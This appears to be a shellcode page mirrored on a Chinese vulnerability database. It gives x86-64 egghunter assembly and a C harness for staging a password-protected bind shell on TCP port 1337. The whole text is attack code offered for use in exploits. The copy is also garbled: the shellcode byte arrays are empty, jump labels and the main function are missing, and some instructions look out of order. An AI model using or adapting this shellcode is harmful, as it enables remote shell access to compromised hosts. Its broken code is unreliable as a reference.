Linux/x64 - Bind (1337/TCP) Shell + Password (pAzzW0rd) + Egghunter Using sys_access() Shellcode (49 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057182 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
漏洞平台 Linux_x86-64 CVSS评分 N/A
; Author Doreth.Z10
; Linux x86_64 Egghunter using sys_access()
; Shellcode size 49 bytes

global _start

section .text


    xor rsi, rsi        ; Some prep junk.
    push rsi
    pop rdx
    push 8
    pop rbx

    or dx, 0xfff        ; We align with a page size of 0x1000

    inc rdx             ; next byte offset
    push 21         
    pop rax             ; We load access() in RAX
    push rdx
    pop rdi
    add rdi, rbx        ; We need to be sure our 8 byte egg check does not span across 2 pages
    syscall             ; syscall to access()

    cmp al, 0xf2        ; Checks for EFAULT.  EFAULT indicates bad page access.
    jz go_end_of_page   ; if EFAULT, try next page

    ; --
    ; Put your won egg here !

    mov eax, 0xBEBDBEBD ; Egg contruction so we dont catch ourself !
    not eax             ; Important, EGG must contain NOP like instruction bytecode.
    ; --
    mov rdi, rdx
    jnz next_byte       ; if egg does not match, try next byte
    cmp eax, [rdi]
    jnz next_byte       ; if egg does not match, try next byte

    jmp rdi             ; Good, found egg. Jump !
                        ; Important, EGG must contain NOP like instruction bytecode.

; Egghunter demonstration
; bindshell is pushed in the heap using a malloc() call and pre-pended with the egg. Then egghunter is fired.
; Depending on size of the malloc() call, binshell can be anywhere in the address space.
; For a big malloc() size like 1 000 000 bytes, it will be placed far in the address space.
; A malloc(1000000) was tested on a Unbuntu system with Inter Core i7 and it took over 9 hrs for the egghunter
; to find the egg. 
; Enjoy.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

unsigned char egg[] = 
"YOUR EGG HERE 4 bytes";

// In this example we use a password protected binshell on port 1337: pAzzW0rd 
unsigned char bindshell[] = 

unsigned char egghunter[] = 


    char *heap = (char*)malloc(1000000);
    memset(heap, '\0', 512);
    strncpy(heap, egg, 4);
    strncpy(heap+4, egg, 4);
    strncpy(heap+8, bindshell, 212);

    printf("Egghunter Length: %d\n", strlen(egghunter));
    printf("Shellcode Length: %d\n", strlen(bindshell));
        int (*ret)() = (int(*)())egghunter;
    return 0;